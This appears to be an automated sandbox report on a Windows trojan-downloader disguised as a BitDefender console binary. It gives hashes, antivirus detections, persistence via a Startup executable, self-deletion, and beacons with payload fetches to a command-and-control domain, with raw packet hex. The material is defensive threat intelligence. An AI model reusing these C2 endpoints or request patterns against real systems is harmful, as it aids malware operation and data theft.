Analysis Date: 2015-06-13 08:05:21
MD5: 13b47cad6d1920bb4902017e848e2f27
SHA1: fd31547cc9dd4d239ca1073211dffeb170a4ee82

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section UPX0 (md5: d41d8cd98f00b204e9800998ecf8427e, sha1: da39a3ee5e6b4b0d3255bfef95601890afd80709, size: 0)
Section UPX1 (md5: a6696dd8556d3262794f97a60a002021, sha1: 24d0cb292c2cd82f935c828f724d26a56ceeeea9, size: 79872)
Section .rsrc (md5: 9598e614f1deca8254f5861db69369fa, sha1: a03eab35b603d47d85f3eb86208c4d6b78a3a4e4, size: 1536)
Timestamp: 2006-09-24 06:40:04
Version:
  LegalCopyright: © 2006 SOFTWIN S.R.L.
  InternalName: Management Console
  FileVersion: 10, 2, 0, 15
  CompanyName: SOFTWIN S.R.L.
  ProductName: BitDefender 10
  ProductVersion: 10, 2, 0, 15
  FileDescription: BitDefender Management Console
  OriginalFilename: bdmcon.exe
Packer: UPX -> www.upx.sourceforge.net
PEhash: cedda77b2ceb3157ae2796aae6a45c0ec3a1be33
IMPhash: d8ffd01375769ab5ef057d6a238f55de
AV Avira (antivir): TR/Dldr.Small.auep
AV Ikarus: Trojan-Downloader.Win32.Small
AV F-Secure: Gen:Variant.Zbot.19
AV CA (E-Trust Ino): Win32/PornoAsset.A!generic
AV Mcafee: no_virus
AV Arcabit (arcavir): Gen:Variant.Zbot.19
AV Frisk (f-prot): W32/Zbot.AM.gen!Eldorado
AV Padvish: no_virus
AV BitDefender: Gen:Variant.Zbot.19
AV Trend Micro: TROJ_DLOAD.KLL
AV Microsoft Security Essentials: TrojanDownloader:Win32/Carberp.A
AV Grisoft (avg): Downloader.Generic10.RCB
AV Ad-Aware: Gen:Variant.Zbot.19
AV Twister: Trojan.210D090208@1F0000.mg
AV MalwareBytes: Spyware.Passwords.XGen
AV Alwil (avast): Evo-gen [Susp]
AV BullGuard: Gen:Variant.Zbot.19
AV Emsisoft: Gen:Variant.Zbot.19
AV Eset (nod32): Win32/Kryptik.GQM
AV Symantec: Downloader
AV ClamAV: Trojan.Generic.FakeAV.WKA-1
AV K7: Backdoor ( 04c4d5271 )
AV MicroWorld (escan): Gen:Variant.Zbot.19
AV Fortinet: W32/Krypt.A!tr.dldr
AV VirusBlokAda (vba32): Malware-Cryptor.Win32.General.4.1
AV Authentium: W32/Zbot.AM.gen!Eldorado
AV Zillya!: no_virus
AV CAT (quickheal): no_virus
AV Dr. Web: Trojan.PWS.Stealer.258
AV Kaspersky: Trojan.Win32.Generic
AV Rising: no_virus

Runtime Details:

Process
↳ C:\malware.exe

Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\~TM5.tmp
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\3.tmp
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\1.tmp
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\6.tmp
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\~TM4.tmp
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\2.tmp
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temp\~TM5.tmp
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temp\3.tmp
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temp\1.tmp
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temp\~TM4.tmp
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temp\2.tmp
Creates Process: C:\WINDOWS\explorer.exe

Process
↳ C:\WINDOWS\explorer.exe

Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\8.tmp
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Start Menu\Programs\Startup\syscron.exe
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\B.tmp
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\12.tmp
Creates File: C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\C.tmp
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\7.tmp
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\9.tmp
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\A.tmp
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temp\8.tmp
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temp\6.tmp
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temp\B.tmp
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temp\12.tmp
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temp\C.tmp
Deletes File: C:\malware.exe
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temp\7.tmp
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temp\9.tmp
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temp\A.tmp
Creates Process: C:\WINDOWS\system32\svchost.exe -k netsvcs
Creates Process: C:\WINDOWS\system32\svchost.exe -k netsvcs

Process
↳ C:\WINDOWS\system32\svchost.exe -k netsvcs

Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ NULL
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\10.tmp
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\F.tmp
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\E.tmp
Creates File: C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File: PIPE\lsarpc
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Application Data\usernt.dat
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temp\D.tmp
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temp\F.tmp
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temp\E.tmp
Creates Mutex: c:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex: c:!documents and settings!administrator!cookies!
Creates Mutex: c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNS: yandexsecurity.com

Process
↳ C:\WINDOWS\system32\svchost.exe -k netsvcs

Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ NULL
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\14.tmp
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\11.tmp
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\13.tmp
Creates File: PIPE\lsarpc
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temp\14.tmp
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temp\11.tmp
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temp\13.tmp
Winsock DNS: yandexsecurity.com

Network Details:

DNS: yandexsecurity.com  Type: A  141.8.225.80
DNS: yandexsecurity.com  Type: A  141.8.225.80
HTTP GET: http://yandexsecurity.com/task.php?id=HEXOR09F2F48419E66A986C91571E13C2E0452&task=0
  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.1.4) Gecko/20091016 Firefox/3.5.4
HTTP GET: http://yandexsecurity.com/micfile.pcp
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET: http://yandexsecurity.com/grabber.pcp
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Flows TCP: 192.168.1.1:1032 ➝ 141.8.225.80:80
Flows TCP: 192.168.1.1:1033 ➝ 141.8.225.80:80
Flows TCP: 192.168.1.1:1034 ➝ 141.8.225.80:80
Flows TCP: 192.168.1.1:1035 ➝ 141.8.225.80:80
Flows TCP: 192.168.1.1:1036 ➝ 141.8.225.80:80
Flows TCP: 192.168.1.1:1037 ➝ 141.8.225.80:80

Raw Pcap
0x00000000 (00000)   47455420 2f746173 6b2e7068 703f6964   GET /task.php?id
0x00000010 (00016)   3d484558 4f523039 46324634 38343139   =HEXOR09F2F48419
0x00000020 (00032)   45363641 39383643 39313537 31453133   E66A986C91571E13
0x00000030 (00048)   43324530 34353226 7461736b 3d302048   C2E0452&task=0 H
0x00000040 (00064)   5454502f 312e300d 0a486f73 743a2079   TTP/1.0..Host: y
0x00000050 (00080)   616e6465 78736563 75726974 792e636f   andexsecurity.co
0x00000060 (00096)   6d0d0a55 7365722d 4167656e 743a204d   m..User-Agent: M
0x00000070 (00112)   6f7a696c 6c612f35 2e302028 57696e64   ozilla/5.0 (Wind
0x00000080 (00128)   6f77733b 20553b20 57696e64 6f777320   ows; U; Windows 
0x00000090 (00144)   4e542035 2e313b20 72753b20 72763a31   NT 5.1; ru; rv:1
0x000000a0 (00160)   2e392e31 2e342920 4765636b 6f2f3230   .9.1.4) Gecko/20
0x000000b0 (00176)   30393130 31362046 69726566 6f782f33   091016 Firefox/3
0x000000c0 (00192)   2e352e34 0d0a436f 6e6e6563 74696f6e   .5.4..Connection
0x000000d0 (00208)   3a20636c 6f73650d 0a0d0a              : close....

0x00000000 (00000)   47455420 2f6d6963 66696c65 2e706370   GET /micfile.pcp
0x00000010 (00016)   20485454 502f312e 310d0a55 7365722d    HTTP/1.1..User-
0x00000020 (00032)   4167656e 743a204d 6f7a696c 6c612f34   Agent: Mozilla/4
0x00000030 (00048)   2e302028 636f6d70 61746962 6c653b20   .0 (compatible; 
0x00000040 (00064)   4d534945 20362e30 3b205769 6e646f77   MSIE 6.0; Window
0x00000050 (00080)   73204e54 20352e31 3b205356 313b202e   s NT 5.1; SV1; .
0x00000060 (00096)   4e455420 434c5220 322e302e 35303732   NET CLR 2.0.5072
0x00000070 (00112)   37290d0a 486f7374 3a207961 6e646578   7)..Host: yandex
0x00000080 (00128)   73656375 72697479 2e636f6d 0d0a4361   security.com..Ca
0x00000090 (00144)   6368652d 436f6e74 726f6c3a 206e6f2d   che-Control: no-
0x000000a0 (00160)   63616368 650d0a0d 0a65636b 6f2f3230   cache....ecko/20
0x000000b0 (00176)   30393130 31362046 69726566 6f782f33   091016 Firefox/3
0x000000c0 (00192)   2e352e34 0d0a436f 6e6e6563 74696f6e   .5.4..Connection
0x000000d0 (00208)   3a20636c 6f73650d 0a0d0a              : close....

0x00000000 (00000)   47455420 2f677261 62626572 2e706370   GET /grabber.pcp
0x00000010 (00016)   20485454 502f312e 310d0a55 7365722d    HTTP/1.1..User-
0x00000020 (00032)   4167656e 743a204d 6f7a696c 6c612f34   Agent: Mozilla/4
0x00000030 (00048)   2e302028 636f6d70 61746962 6c653b20   .0 (compatible; 
0x00000040 (00064)   4d534945 20362e30 3b205769 6e646f77   MSIE 6.0; Window
0x00000050 (00080)   73204e54 20352e31 3b205356 313b202e   s NT 5.1; SV1; .
0x00000060 (00096)   4e455420 434c5220 322e302e 35303732   NET CLR 2.0.5072
0x00000070 (00112)   37290d0a 486f7374 3a207961 6e646578   7)..Host: yandex
0x00000080 (00128)   73656375 72697479 2e636f6d 0d0a4361   security.com..Ca
0x00000090 (00144)   6368652d 436f6e74 726f6c3a 206e6f2d   che-Control: no-
0x000000a0 (00160)   63616368 650d0a0d 0a65636b 6f2f3230   cache....ecko/20
0x000000b0 (00176)   30393130 31362046 69726566 6f782f33   091016 Firefox/3
0x000000c0 (00192)   2e352e34 0d0a436f 6e6e6563 74696f6e   .5.4..Connection
0x000000d0 (00208)   3a20636c 6f73650d 0a0d0a              : close....


Strings